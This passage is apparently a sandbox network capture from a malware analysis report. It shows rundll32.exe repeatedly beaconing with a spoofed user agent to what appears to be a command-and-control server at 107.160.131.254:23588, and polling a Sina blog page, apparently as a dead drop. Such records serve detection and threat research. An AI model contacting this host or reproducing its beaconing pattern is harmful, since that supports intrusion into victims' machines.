User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.5 | 51564 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:11.264411926 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:35:13.774283886 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:35:13 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.5 | 51803 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:15.263513088 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.5 | 51810 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:15.378885984 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.5 | 51811 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:15.380764008 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:35:17.090538979 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:35:16 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.5 | 52806 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:19.306094885 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          74 | 192.168.2.5 | 52999 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:35:19.565332890 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          75 | 192.168.2.5 | 53337 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:35:20.644289017 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:35:22.454828978 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:35:22 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          76 | 192.168.2.5 | 55397 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:35:23.551124096 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:35:25.922816992 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:35:25 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          77 | 192.168.2.5 | 55398 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:35:23.553046942 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          78 | 192.168.2.5 | 55399 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:35:23.554677963 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          79 | 192.168.2.5 | 58021 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:35:27.710355997 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          80 | 192.168.2.5 | 58024 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:35:28.026566982 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          81 | 192.168.2.5 | 58026 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:35:28.037859917 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:35:29.752093077 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:35:29 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          82 | 192.168.2.5 | 59600 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:35:31.848117113 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          83 | 192.168.2.5 | 59713 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:35:31.922398090 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          84 | 192.168.2.5 | 59752 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:35:31.957998037 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          85 | 192.168.2.5 | 62269 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:35:35.986850977 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:35:37.694819927 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:35:37 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          86 | 192.168.2.5 | 62270 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:35:35.990951061 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          87 | 192.168.2.5 | 62271 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:35:35.991053104 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          88 | 192.168.2.5 | 64965 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:35:39.807642937 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          89 | 192.168.2.5 | 65081 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:35:40.000137091 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          90 | 192.168.2.5 | 65116 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:35:40.126209974 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          91 | 192.168.2.5 | 65117 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:35:40.127289057 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:35:41.868916035 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:35:41 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.5 | 51043 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:44.125111103 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.5 | 51144 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:44.251338005 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.5 | 51145 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:44.251538038 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:35:45.970633984 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:35:45 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.5 | 53634 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:48.248791933 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.5 | 53691 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:48.365900993 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:35:50.736736059 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:35:50 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.5 | 53692 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:48.365900993 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.5 | 55778 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:52.264977932 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.5 | 55835 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:52.408742905 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.5 | 55836 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:52.409044981 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.5 | 57965 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:56.285142899 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.5 | 58043 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:56.396898985 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:35:58.175431013 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:35:57 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.5 | 58045 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:56.403100014 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.2.5 | 60319 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:00.296431065 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.5 | 60345 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:00.428411007 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.2.5 | 61064 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:01.765031099 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:36:03.559776068 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:36:03 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.2.5 | 62729 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:04.431344986 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.2.5 | 62823 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:04.557611942 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
109 | 192.168.2.5 | 62825 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:04.558063984 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
110 | 192.168.2.5 | 49177 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:08.567744970 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
111 | 192.168.2.5 | 49188 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:08.696515083 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
112 | 192.168.2.5 | 49190 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:08.701653957 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:36:11.078775883 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:36:10 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
113 | 192.168.2.5 | 51340 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:12.701181889 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
